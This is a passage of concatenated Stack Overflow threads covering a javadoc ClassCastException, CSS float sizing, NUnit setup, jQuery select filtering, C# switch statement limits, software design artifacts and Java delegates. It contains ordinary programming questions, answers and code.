[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1702)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDocletWriter.writeAnnotationInfo(HtmlDocletWriter.java:1681)
[javadoc] at com.sun.tools.doclets.formats.html.FieldWriterImpl.writeSignature(FieldWriterImpl.java:130)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.buildSignature(FieldBuilder.java:184)
[javadoc] at sun.reflect.GeneratedMethodAccessor8.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.invokeMethod(FieldBuilder.java:114)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractMemberBuilder.build(AbstractMemberBuilder.java:56)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.buildFieldDoc(FieldBuilder.java:158)
[javadoc] at sun.reflect.GeneratedMethodAccessor51.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.FieldBuilder.invokeMethod(FieldBuilder.java:114)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractMemberBuilder.build(AbstractMemberBuilder.java:56)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.buildFieldDetails(ClassBuilder.java:301)
[javadoc] at sun.reflect.GeneratedMethodAccessor43.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.invokeMethod(ClassBuilder.java:101)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.buildClassDoc(ClassBuilder.java:124)
[javadoc] at sun.reflect.GeneratedMethodAccessor19.invoke(Unknown Source)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.invokeMethod(ClassBuilder.java:101)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.AbstractBuilder.build(AbstractBuilder.java:90)
[javadoc] at com.sun.tools.doclets.internal.toolkit.builders.ClassBuilder.build(ClassBuilder.java:108)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDoclet.generateClassFiles(HtmlDoclet.java:155)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.generateClassFiles(AbstractDoclet.java:164)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.startGeneration(AbstractDoclet.java:106)
[javadoc] at com.sun.tools.doclets.internal.toolkit.AbstractDoclet.start(AbstractDoclet.java:64)
[javadoc] at com.sun.tools.doclets.formats.html.HtmlDoclet.start(HtmlDoclet.java:42)
[javadoc] at com.sun.tools.doclets.standard.Standard.start(Standard.java:23)
[javadoc] at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
[javadoc] at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
[javadoc] at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
[javadoc] at java.lang.reflect.Method.invoke(Method.java:597)
[javadoc] at com.sun.tools.javadoc.DocletInvoker.invoke(DocletInvoker.java:215)
[javadoc] at com.sun.tools.javadoc.DocletInvoker.start(DocletInvoker.java:91)
[javadoc] at com.sun.tools.javadoc.Start.parseAndExecute(Start.java:340)
[javadoc] at com.sun.tools.javadoc.Start.begin(Start.java:128)
[javadoc] at com.sun.tools.javadoc.Main.execute(Main.java:41)
[javadoc] at com.sun.tools.javadoc.Main.main(Main.java:31)
A: It looks like this has been reported as a Java bug. It appears to be caused by using annotations from a 3rd party library (like JUnit) and not including the jar with that annotation in the javadoc invocation.
If that is the case, just use the -classpath option on javadoc and include the extra jar files.
A: I have some idea regarding this problem but this not exact solution to get.
If you give single comment line // before annotation and try to run the javadoc once again. This problem will solve
Eg: sample.java file
@ChannelPipeline
Makes changes in
//@ChannelPipeline
Try to run javadoc command once again. Now ClassCastException won't occur.
A: There is another way to get a ClassCastException in versions of Java from 5 through 8:
java.lang.ClassCastException: com.sun.tools.javadoc.MethodDocImpl cannot be cast to com.sun.tools.javadoc.AnnotationTypeElementDocImpl
It will happen when javadoc encounters a reference to a annotation method in javadoc text before processing the same annotation for the first time used in code. Take these two classes:
/**
** {@link javax.annotation.Generated#value()}
*/
public class TestClass1 {}
@Generated("sometext")
public class TestClass2 {}
The bug is order dependent. If javadoc processes TestClass1 first, the ClassCastException will be thrown. If javadoc processes TestClass2 first, it will complete fine. The bug is reported as JDK-8170444, and was resolved as "Won't Fix". The bug is no longer present in Java 9.
As a workaround, don't link to annotation methods in your documentation text.
A: I got this problem too. I can compile properly without any errors or warnings. But when I generating javadoc , I got below error.
[javadoc] java.lang.ClassCastException: com.sun.tools.javadoc.ClassDocImpl cannot be cast to com.sun.javadoc.AnnotationTypeDoc
Here is my classpath loading for my third-party-libs ...
<path id="build.classpath">
<fileset dir=".">
<include name="libs/*.jar" />
</fileset>
At my java compile target ..
<target name="compile" depends="clean, makedir">
<javac includeantruntime="false" srcdir="${src.dir}" destdir="${build.dir}" classpathref="build.classpath">
<compilerarg value="-Xlint:unchecked"/>
</javac>
And at my javadoc target...
<target name="docs" depends="compile">
<javadoc packagenames="src" sourcepath="${src.dir}" destdir="${docs.dir}"
failonerror="no"
author="true"
version="true"
windowtitle="${Name} API"
doctitle="${Name}"
bottom="Copyright © 2014 ColayHIlls.com . All Rights Reserved.">
<fileset dir="${src.dir}">
<include name="main/java/com/colayhills/jpcenter/business/service/**" />
</fileset>
</javadoc>
<echo message="java docs has been generated!"/>
</target>
So , I added classpathref="build.classpath" option to <javadoc tag. Now It is fine for me.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44853",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: Is there any easy way to determine what factors are contributing to the size of an HTML element? For example I have a situation where I have something like this (contrived) example:
<div id="outer" style="margin: auto>
<div id="inner1" style="float: left">content</div>
<div id="inner2" style="float: left">content</div>
<div id="inner3" style="float: left">content</div>
<br style="clear: both"/>
</div>
where there are no widths set on any elements, and what I want is #inner1, #inner2 and #inner3 to appear next to each other horizontally inside #outer but what is happening is that #inner1 and #inner2 are appearing next to each other and then #inner3 is wrapping on to the next line.
In the actual page where this is happening there is a lot more going on, but I have inspected all of the elements very carefully with Firebug and do not understand why the #inner3 element is not appearing on the same line as #inner1 and #inner2 and causing #outer to get wider.
So, my question is: Is there any way to determine why the browser is sizing #outer the way it is, or why it is choosing to wrap #inner3 even though there is plenty of room to put it on the previous "line"? Baring specific solutions to this problem, what tips or techniques do you hardcore HTML/CSS/Web UI guys have for a poor back end developer who has found himself working on the front end?
A: It would be nice to have a tool that could tell you exactly what all your layout problems are, but in this case the browser rendered the page exactly how it should have -- the combined width of the floats exceeded the width of the containing block, so the last one drops to a new line (this is slightly different than the IE6 expanding box/float drop problem which is typically caused by content inside the float, not the floats themselves). So in this case, there was nothing wrong with your page.
Debugging this is simply a matter of walking through your HTML in Firebug and figuring out which children of a block is exceeding the block's width. Firebug provides plenty of information for this purpose, although sometimes I need to use a calculator. I think what you described about being able to see which elements constrain other elements would simply be too complex and overwhelming, especially for elements that are removed from normal flow (such as floats or positioned elements).
Also, a deeper understanding of how CSS layout helps a lot as well. It can get pretty complicated.
For example, it is generally recommended to assign explicit widths to floated elements -- the W3C CSS2 spec states that floats need to have an explicit width, and does not provide instructions of what to do without it. I think most modern browsers use the "shrink to fit" method, and will constrain themselves to the width of the content. However, this is not guaranteed in older browsers, and in something like a 3-column layout, you'll be at the mercy of at the width of content inside the floats.
Also, if you're striving for IE6 compatibility, there are a number of float related bugs that could also cause similar problems.
A: Try the Web Developer Plugin for Firefox. Specifically, the Information -> Display Block Size and Outline -> Outline Block Level Elements options. This will allow to see the borders of your elements, and their size as Firefox sees them.
A: In Firebug's CSS tab, you can see what style rules apply to a selected elements in the cascading order. This may or may not help you in your problem.
My guess would be that something about the content of #inner3 is causing it to wrap below the first line, and the #outer is just getting sized to accommodate the smaller needed space.
A: So I found the answer in my specific case -- there was a div much further up in the DOM that had specific left/right margins set which compressed it and everything in it.
But the heart of the question is really how can you easily debug this sort of issue? What would be perfect in this case for example would be something in Firebug that, when hovering over an element's size in the layout panel would display a tool tip that says something like "width constrained by outer element X; height constrained by style Z on element Q" or "width contributed to by inner elements A, B and C".
I wish I had the time to write something like this, although I suspect it would be difficult (if not impossible) to get that information out of Firefox's rendering engine.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44864",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to find the current name of the test being executing? I know I can figure out the name of the method as its being executed, just wondering if there is a way from the setup method. I guess an attribute method would work but from the setup method it would be the best.
EDIT NUnit
A: I know this is going to sound negative, but don't do it! :-)
The idea behind the setup method is that it executes something required by every test, which means that it doesn't matter which test is being executed, so you don't need to know the name of the method.
If you are after different data used in initialisation, then call a separate method with the data passed as a parameter from your test method.
If you really want what you are asking for, then you may need a different method that takes the name of the current method as a parameter and call that from your test method.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44899",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Is there any way to repopulate an Html Select's Options without firing the Change event (using jQuery)? I have multiple selects:
<select id="one">
<option value="1">one</option>
<option value="2">two</option>
<option value="3">three</option>
</select>
<select id="two">
<option value="1">one</option>
<option value="2">two</option>
<option value="3">three</option>
</select>
What I want is to select "one" from the first select, then have that option be removed from the second one.
Then if you select "two" from the second one, I want that one removed from the first one.
Here's the JS I have currently:
$(function () {
var $one = $("#one");
var $two = $("#two");
var selectOptions = [];
$("select").each(function (index) {
selectOptions[index] = [];
for (var i = 0; i < this.options.length; i++) {
selectOptions[index][i] = this.options[i];
}
});
$one.change(function () {
var selectedValue = $("option:selected", this).val();
for (var i = 0; i < selectOptions[1].length; i++) {
var exists = false;
for (var x = 0; x < $two[0].options.length; x++) {
if ($two[0].options[x].value == selectOptions[1][i].value)
exists = true;
}
if (!exists)
$two.append(selectOptions[1][i]);
}
$("option[value='" + selectedValue + "']", $two).remove();
});
$two.change(function () {
var selectedValue = $("option:selected", this).val();
for (var i = 0; i < selectOptions[0].length; i++) {
var exists = false;
for (var x = 0; x < $one[0].options.length; x++) {
if ($one[0].options[x].value == selectOptions[0][i].value)
exists = true;
}
if (!exists)
$one.append(selectOptions[0][i]);
}
$("option[value='" + selectedValue + "']", $one).remove();
});
});
But when the elements get repopulated, it fires the change event in the select whose options are changing. I tried just setting the disabled attribute on the option I want to remove, but that doesn't work with IE6.
A: I am not (currently) a user of jQuery, but I can tell you that you need to temporarily disconnect your event handler while you repopulate the items or, at the least, set a flag that you then test for and based on its value, handle the change.
A: Here's the final code that I ended up using, the flag (changeOnce) worked great, thanks @Jason.
$(function () {
var $one = $("#one");
var $two = $("#two");
var selectOptions = [];
$("select").each(function (index) {
selectOptions[index] = [];
for (var i = 0; i < this.options.length; i++) {
selectOptions[index][i] = this.options[i];
}
});
var changeOnce = false;
$one.change(function () {
if (changeOnce) return;
changeOnce = true;
var selectedValue = $("option:selected", this).val();
filterSelect(selectedValue, $two, 1);
changeOnce = false;
});
$two.change(function () {
if (changeOnce) return;
changeOnce = true;
var selectedValue = $("option:selected", this).val();
filterSelect(selectedValue, $one, 0);
changeOnce = false;
});
function filterSelect(selectedValue, $selectToFilter, selectIndex) {
for (var i = 0; i < selectOptions[selectIndex].length; i++) {
var exists = false;
for (var x = 0; x < $selectToFilter[0].options.length; x++) {
if ($selectToFilter[0].options[x].value == selectOptions[selectIndex][i].value)
exists = true;
}
if (!exists)
$selectToFilter.append(selectOptions[selectIndex][i]);
}
$("option[value='" + selectedValue + "']", $selectToFilter).remove();
sortSelect($selectToFilter[0]);
}
function sortSelect(selectToSort) {
var arrOptions = [];
for (var i = 0; i < selectToSort.options.length; i++) {
arrOptions[i] = [];
arrOptions[i][0] = selectToSort.options[i].value;
arrOptions[i][1] = selectToSort.options[i].text;
arrOptions[i][2] = selectToSort.options[i].selected;
}
arrOptions.sort();
for (var i = 0; i < selectToSort.options.length; i++) {
selectToSort.options[i].value = arrOptions[i][0];
selectToSort.options[i].text = arrOptions[i][1];
selectToSort.options[i].selected = arrOptions[i][2];
}
}
});
A: Or you can just hide the option you don't want to show...
function hideSelected($one, $two)
{
$one.bind('change', function()
{
var val = $one.val();
$two.find('option:not(:visible)').show().end()
.find('option[value='+val+']').hide().end();
})
}
hideSelected($one, $two);
hideSelected($two, $one);
EDIT: Oh sorry, this code does not work with IE6...
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44903",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: C# switch statement limitations - why? When writing a switch statement, there appears to be two limitations on what you can switch on in case statements.
For example (and yes, I know, if you're doing this sort of thing it probably means your object-oriented (OO) architecture is iffy - this is just a contrived example!),
Type t = typeof(int);
switch (t) {
case typeof(int):
Console.WriteLine("int!");
break;
case typeof(string):
Console.WriteLine("string!");
break;
default:
Console.WriteLine("unknown!");
break;
}
Here the switch() statement fails with 'A value of an integral type expected' and the case statements fail with 'A constant value is expected'.
Why are these restrictions in place, and what is the underlying justification? I don't see any reason why the switch statement has to succumb to static analysis only, and why the value being switched on has to be integral (that is, primitive). What is the justification?
A: Microsoft finally heard you!
Now with C# 7 you can:
switch(shape)
{
case Circle c:
WriteLine($"circle with radius {c.Radius}");
break;
case Rectangle s when (s.Length == s.Height):
WriteLine($"{s.Length} x {s.Height} square");
break;
case Rectangle r:
WriteLine($"{r.Length} x {r.Height} rectangle");
break;
default:
WriteLine("<unknown shape>");
break;
case null:
throw new ArgumentNullException(nameof(shape));
}
A: While on the topic, according to Jeff Atwood, the switch statement is a programming atrocity. Use them sparingly.
You can often accomplish the same task using a table. For example:
var table = new Dictionary<Type, string>()
{
{ typeof(int), "it's an int!" }
{ typeof(string), "it's a string!" }
};
Type someType = typeof(int);
Console.WriteLine(table[someType]);
A:
I don't see any reason why the switch statement has to succomb to static analysis only
True, it doesn't have to, and many languages do in fact use dynamic switch statements. This means however that reordering the "case" clauses can change the behaviour of the code.
There's some interesting info behind the design decisions that went into "switch" in here: Why is the C# switch statement designed to not allow fall-through, but still require a break?
Allowing dynamic case expressions can lead to monstrosities such as this PHP code:
switch (true) {
case a == 5:
...
break;
case b == 10:
...
break;
}
which frankly should just use the if-else statement.
A: This is not a reason why, but the C# specification section 8.7.2 states the following:
The governing type of a switch statement is established by the switch expression. If the type of the switch expression is sbyte, byte, short, ushort, int, uint, long, ulong, char, string, or an enum-type, then that is the governing type of the switch statement. Otherwise, exactly one user-defined implicit conversion (§6.4) must exist from the type of the switch expression to one of the following possible governing types: sbyte, byte, short, ushort, int, uint, long, ulong, char, string. If no such implicit conversion exists, or if more than one such implicit conversion exists, a compile-time error occurs.
The C# 3.0 specification is located at:
http://download.microsoft.com/download/3/8/8/388e7205-bc10-4226-b2a8-75351c669b09/CSharp%20Language%20Specification.doc
A: Judah's answer above gave me an idea. You can "fake" the OP's switch behavior above using a Dictionary<Type, Func<T>:
Dictionary<Type, Func<object, string, string>> typeTable = new Dictionary<Type, Func<object, string, string>>();
typeTable.Add(typeof(int), (o, s) =>
{
return string.Format("{0}: {1}", s, o.ToString());
});
This allows you to associate behavior with a type in the same style as the switch statement. I believe it has the added benefit of being keyed instead of a switch-style jump table when compiled to IL.
A: The first reason that comes to mind is historical:
Since most C, C++, and Java programmers are not accustomed to having such freedoms, they do not demand them.
Another, more valid, reason is that the language complexity would increase:
First of all, should the objects be compared with .Equals() or with the == operator? Both are valid in some cases. Should we introduce new syntax to do this? Should we allow the programmer to introduce their own comparison method?
In addition, allowing to switch on objects would break underlying assumptions about the switch statement. There are two rules governing the switch statement that the compiler would not be able to enforce if objects were allowed to be switched on (see the C# version 3.0 language specification, §8.7.2):
*
*That the values of switch labels are constant
*That the values of switch labels are distinct (so that only one switch block can be selected for a given switch-expression)
Consider this code example in the hypothetical case that non-constant case values were allowed:
void DoIt()
{
String foo = "bar";
Switch(foo, foo);
}
void Switch(String val1, String val2)
{
switch ("bar")
{
// The compiler will not know that val1 and val2 are not distinct
case val1:
// Is this case block selected?
break;
case val2:
// Or this one?
break;
case "bar":
// Or perhaps this one?
break;
}
}
What will the code do? What if the case statements are reordered? Indeed, one of the reasons why C# made switch fall-through illegal is that the switch statements could be arbitrarily rearranged.
These rules are in place for a reason - so that the programmer can, by looking at one case block, know for certain the precise condition under which the block is entered. When the aforementioned switch statement grows into 100 lines or more (and it will), such knowledge is invaluable.
A: It's important not to confuse the C# switch statement with the CIL switch instruction.
The CIL switch is a jump table, that requires an index into a set of jump addresses.
This is only useful if the C# switch's cases are adjacent:
case 3: blah; break;
case 4: blah; break;
case 5: blah; break;
But of little use if they aren't:
case 10: blah; break;
case 200: blah; break;
case 3000: blah; break;
(You'd need a table ~3000 entries in size, with only 3 slots used)
With non-adjacent expressions, the compiler may start to perform linear if-else-if-else checks.
With larger non- adjacent expression sets, the compiler may start with a binary tree search, and finally if-else-if-else the last few items.
With expression sets containing clumps of adjacent items, the compiler may binary tree search, and finally a CIL switch.
This is full of "mays" & "mights", and it is dependent on the compiler (may differ with Mono or Rotor).
I replicated your results on my machine using adjacent cases:
total time to execute a 10 way switch, 10000 iterations (ms): 25.1383
approximate time per 10 way switch (ms): 0.00251383
total time to execute a 50 way switch, 10000 iterations (ms): 26.593
approximate time per 50 way switch (ms): 0.0026593
total time to execute a 5000 way switch, 10000 iterations (ms): 23.7094
approximate time per 5000 way switch (ms): 0.00237094
total time to execute a 50000 way switch, 10000 iterations (ms): 20.0933
approximate time per 50000 way switch (ms): 0.00200933
Then I also did using non-adjacent case expressions:
total time to execute a 10 way switch, 10000 iterations (ms): 19.6189
approximate time per 10 way switch (ms): 0.00196189
total time to execute a 500 way switch, 10000 iterations (ms): 19.1664
approximate time per 500 way switch (ms): 0.00191664
total time to execute a 5000 way switch, 10000 iterations (ms): 19.5871
approximate time per 5000 way switch (ms): 0.00195871
A non-adjacent 50,000 case switch statement would not compile.
"An expression is too long or complex to compile near 'ConsoleApplication1.Program.Main(string[])'
What's funny here, is that the binary tree search appears a little (probably not statistically) quicker than the CIL switch instruction.
Brian, you've used the word "constant", which has a very definite meaning from a computational complexity theory perspective. While the simplistic adjacent integer example may produce CIL that is considered O(1) (constant), a sparse example is O(log n) (logarithmic), clustered examples lie somewhere in between, and small examples are O(n) (linear).
This doesn't even address the String situation, in which a static Generic.Dictionary<string,int32> may be created, and will suffer definite overhead on first use. Performance here will be dependent on the performance of Generic.Dictionary.
If you check the C# Language Specification (not the CIL spec)
you'll find "15.7.2 The switch statement" makes no mention of "constant time" or that the underlying implementation even uses the CIL switch instruction (be very careful of assuming such things).
At the end of the day, a C# switch against an integer expression on a modern system is a sub-microsecond operation, and not normally worth worrying about.
Of course these times will depend on machines and conditions. I wouldn’t pay attention to these timing tests, the microsecond durations we’re talking about are dwarfed by any “real” code being run (and you must include some “real code” otherwise the compiler will optimise the branch away), or jitter in the system. My answers are based on using IL DASM to examine the CIL created by the C# compiler. Of course, this isn’t final, as the actual instructions the CPU runs are then created by the JIT.
I have checked the final CPU instructions actually executed on my x86 machine, and can confirm a simple adjacent set switch doing something like:
jmp ds:300025F0[eax*4]
Where a binary tree search is full of:
cmp ebx, 79Eh
jg 3000352B
cmp ebx, 654h
jg 300032BB
…
cmp ebx, 0F82h
jz 30005EEE
A: This is my original post, which sparked some debate... because it is wrong:
The switch statement is not the same
thing as a big if-else statement.
Each case must be unique and evaluated
statically. The switch statement does
a constant time branch regardless of
how many cases you have. The if-else
statement evaluates each condition
until it finds one that is true.
In fact, the C# switch statement is not always a constant time branch.
In some cases the compiler will use a CIL switch statement which is indeed a constant time branch using a jump table. However, in sparse cases as pointed out by Ivan Hamilton the compiler may generate something else entirely.
This is actually quite easy to verify by writing various C# switch statements, some sparse, some dense, and looking at the resulting CIL with the ildasm.exe tool.
A: Mostly, those restrictions are in place because of language designers. The underlying justification may be compatibility with languange history, ideals, or simplification of compiler design.
The compiler may (and does) choose to:
*
*create a big if-else statement
*use a MSIL switch instruction (jump table)
*build a Generic.Dictionary<string,int32>, populate it on first use, and call
Generic.Dictionary<>::TryGetValue()
for a index to pass to a MSIL switch
instruction (jump table)
*use a
combination of if-elses & MSIL
"switch" jumps
The switch statement IS NOT a constant time branch. The compiler may find short-cuts (using hash buckets, etc), but more complicated cases will generate more complicated MSIL code with some cases branching out earlier than others.
To handle the String case, the compiler will end up (at some point) using a.Equals(b) (and possibly a.GetHashCode() ). I think it would be trival for the compiler to use any object that satisfies these constraints.
As for the need for static case expressions... some of those optimisations (hashing, caching, etc) would not be available if the case expressions weren't deterministic. But we've already seen that sometimes the compiler just picks the simplistic if-else-if-else road anyway...
Edit: lomaxx - Your understanding of the "typeof" operator is not correct. The "typeof" operator is used to obtain the System.Type object for a type (nothing to do with its supertypes or interfaces). Checking run-time compatibility of an object with a given type is the "is" operator's job. The use of "typeof" here to express an object is irrelevant.
A: By the way, VB, having the same underlying architecture, allows much more flexible Select Case statements (the above code would work in VB) and still produces efficient code where this is possible so the argument by techical constraint has to be considered carefully.
A: I suppose there is no fundamental reason why the compiler couldn't automatically translate your switch statement into:
if (t == typeof(int))
{
...
}
elseif (t == typeof(string))
{
...
}
...
But there isn't much gained by that.
A case statement on integral types allows the compiler to make a number of optimizations:
*
*There is no duplication (unless you duplicate case labels, which the compiler detects). In your example t could match multiple types due to inheritance. Should the first match be executed? All of them?
*The compiler can choose to implement a switch statement over an integral type by a jump table to avoid all the comparisons. If you are switching on an enumeration that has integer values 0 to 100 then it creates an array with 100 pointers in it, one for each switch statement. At runtime it simply looks up the address from the array based on the integer value being switched on. This makes for much better runtime performance than performing 100 comparisons.
A: According to the switch statement documentation if there is an unambiguous way to implicitly convert the the object to an integral type, then it will be allowed. I think you are expecting a behavior where for each case statement it would be replaced with if (t == typeof(int)), but that would open a whole can of worms when you get to overload that operator. The behavior would change when implementation details for the switch statement changed if you wrote your == override incorrectly. By reducing the comparisons to integral types and string and those things that can be reduced to integral types (and are intended to) they avoid potential issues.
A: I have virtually no knowledge of C#, but I suspect that either switch was simply taken as it occurs in other languages without thinking about making it more general or the developer decided that extending it was not worth it.
Strictly speaking you are absolutely right that there is no reason to put these restrictions on it. One might suspect that the reason is that for the allowed cases the implementation is very efficient (as suggested by Brian Ensink (44921)), but I doubt the implementation is very efficient (w.r.t. if-statements) if I use integers and some random cases (e.g. 345, -4574 and 1234203). And in any case, what is the harm in allowing it for everything (or at least more) and saying that it is only efficient for specific cases (such as (almost) consecutive numbers).
I can, however, imagine that one might want to exclude types because of reasons such as the one given by lomaxx (44918).
Edit: @Henk (44970): If Strings are maximally shared, strings with equal content will be pointers to the same memory location as well. Then, if you can make sure that the strings used in the cases are stored consecutively in memory, you can very efficiently implement the switch (i.e. with execution in the order of 2 compares, an addition and two jumps).
A:
wrote:
"The switch statement does a constant time branch regardless of how many cases you have."
Since the language allows the string type to be used in a switch statement I presume the compiler is unable to generate code for a constant time branch implementation for this type and needs to generate an if-then style.
@mweerden - Ah I see. Thanks.
I do not have a lot of experience in C# and .NET but it seems the language designers do not allow static access to the type system except in narrow circumstances. The typeof keyword returns an object so this is accessible at run-time only.
A: I think Henk nailed it with the "no sttatic access to the type system" thing
Another option is that there is no order to types where as numerics and strings can be. Thus a type switch would can't build a binary search tree, just a linear search.
A: I agree with this comment that using a table driven approach is often better.
In C# 1.0 this was not possible because it didn't have generics and anonymous delegates.
New versions of C# have the scaffolding to make this work. Having a notation for object literals is also helps.
A: C# 8 allows you to solve this problem elegantly and compactly using an switch expression:
public string GetTypeName(object obj)
{
return obj switch
{
int i => "Int32",
string s => "String",
{ } => "Unknown",
_ => throw new ArgumentNullException(nameof(obj))
};
}
As a result, you get:
Console.WriteLine(GetTypeName(obj: 1)); // Int32
Console.WriteLine(GetTypeName(obj: "string")); // String
Console.WriteLine(GetTypeName(obj: 1.2)); // Unknown
Console.WriteLine(GetTypeName(obj: null)); // System.ArgumentNullException
You can read more about the new feature here.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44905",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "149"
} |
Q: What essential design artifacts do you produce? In the course of your software development lifecycle, what essential design artifacts do you produce? What makes them essential to your practice?
The project I'm currently on has been in production for 8+ years. This web application has been actively enhanced and maintained over that time. While we have CMMI based policies and processes in place, with portions of our practice being well defined, the design phase has been largely overlooked. Best practices, anyone?
A: Working code...and whiteboard drawings.
:P
A: Having worked on a lot of waterfall projects in the past and a lot of adhoc and agile projects more recently, there's a number of design artifacts I like to create although I can't state enough that it really depends on the details of the project (methodology/team structure/timescale/tools etc).
For a generic, server-based 'enterprise application' I'd want the bare minimum to be something along these lines:
*
*A detailed functional design document (aka spec). Generally something along the lines of Joel s' WhatsTimeIsIt example spec, although probably with some UML use-case diagrams.
*A software techical design document. Not necessarily detailed for 100% system coverage but detailed in all the key areas and containing all the design decisions. Being a bit of an UML freak it'd be nice to see lots of pictures along the lines of package diagrams, component diagrams, key feature class diagrams, and probably some sequence diagrams thrown in for good measure.
*An infrastructure design document. Probably with UML deployment diagram for the conceptual deisng and perhaps a network diagram for something more physical.
When I say document any of the above might be broken down into multiple documents, or perhaps stored on a wiki/some other tool.
As for their usefulness, my philosophy has always been that a development team should always be able to hand over an application to a support team without having to hand over their phone numbers. If the design artifacts don't clealry indicate what the application does, how it does it, and where it does it then you know the support team are going to give the app the same care and attention they would a rabid dog.
I should mention I'm not vindicating the practice of handing software over from a dev team to a support team once it's finished, which raises all manner of interesting issues, I'm just saying it should be possible if the management so desired.
A: Designs change so much during development and afterwards that most of my carefully crafted documents rot away in source control and become almost more of a hindrance than a help, once code is in production. I see design documents as necessary to good communication and to clarify your thinking while you develop something, but after that it takes a herculean effort to keep them properly maintained.
I do take pictures of whiteboards and save the JPEGs to source control. Those are some of my best design docs!
A: In our model (which is fairly specific to business process applications) the design artefacts include:
*
*a domain data model, with comments on each entity and attribute
*a properties file listing all the modify and create triggers on each entity, calculated attributes, validators and other business logic
*a set of screen definitions (view model)
However do these really count as design artefacts? Our framework is such that these definitions are used to generate the actual code of the system, so maybe they go beyond design.
But the fact that they serve double duty is powerful because they are, by definition, up to date and synchronised with the code at all times.
A: This is not a design document, per se, but our unit tests serve the dual purpose of "describing" how the code they test is supposed to function. The nice part about this is that they never get out of date, since our unit tests must pass for our build to succeed.
A: I don't think anything can take the place of a good old fashioned design spec for the following reasons:
*
*It serves as a means of communicating how you will build an application to others.
*It lets you get ideas out of your head so you don't worry about tracking a million things at the same time.
*If you have to pause a project and return to it later you're not starting your thought process over again.
I like to see various bits of info in a design spec:
*
*General explanation of your approach to the challenge at hand
*How will you monitor your application?
*What are the security concerns and how are they addressed?
*Flowcharts / sequence diagrams
*Open issues
*Known limitations
Unit tests, while a fantastic and arguably critical item to include in your application development, don't cover all of these topics.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44909",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Java Delegates? Does the Java language have delegate features, similar to how C# has support for delegates?
A: Depending precisely what you mean, you can achieve a similar effect (passing around a method) using the Strategy Pattern.
Instead of a line like this declaring a named method signature:
// C#
public delegate void SomeFunction();
declare an interface:
// Java
public interface ISomeBehaviour {
void SomeFunction();
}
For concrete implementations of the method, define a class that implements the behaviour:
// Java
public class TypeABehaviour implements ISomeBehaviour {
public void SomeFunction() {
// TypeA behaviour
}
}
public class TypeBBehaviour implements ISomeBehaviour {
public void SomeFunction() {
// TypeB behaviour
}
}
Then wherever you would have had a SomeFunction delegate in C#, use an ISomeBehaviour reference instead:
// C#
SomeFunction doSomething = SomeMethod;
doSomething();
doSomething = SomeOtherMethod;
doSomething();
// Java
ISomeBehaviour someBehaviour = new TypeABehaviour();
someBehaviour.SomeFunction();
someBehaviour = new TypeBBehaviour();
someBehaviour.SomeFunction();
With anonymous inner classes, you can even avoid declaring separate named classes and almost treat them like real delegate functions.
// Java
public void SomeMethod(ISomeBehaviour pSomeBehaviour) {
...
}
...
SomeMethod(new ISomeBehaviour() {
@Override
public void SomeFunction() {
// your implementation
}
});
This should probably only be used when the implementation is very specific to the current context and wouldn't benefit from being reused.
And then of course in Java 8, these do become basically lambda expressions:
// Java 8
SomeMethod(() -> { /* your implementation */ });
A: No, but they're fakeable using proxies and reflection:
public static class TestClass {
public String knockKnock() {
return "who's there?";
}
}
private final TestClass testInstance = new TestClass();
@Test public void
can_delegate_a_single_method_interface_to_an_instance() throws Exception {
Delegator<TestClass, Callable<String>> knockKnockDelegator = Delegator.ofMethod("knockKnock")
.of(TestClass.class)
.to(Callable.class);
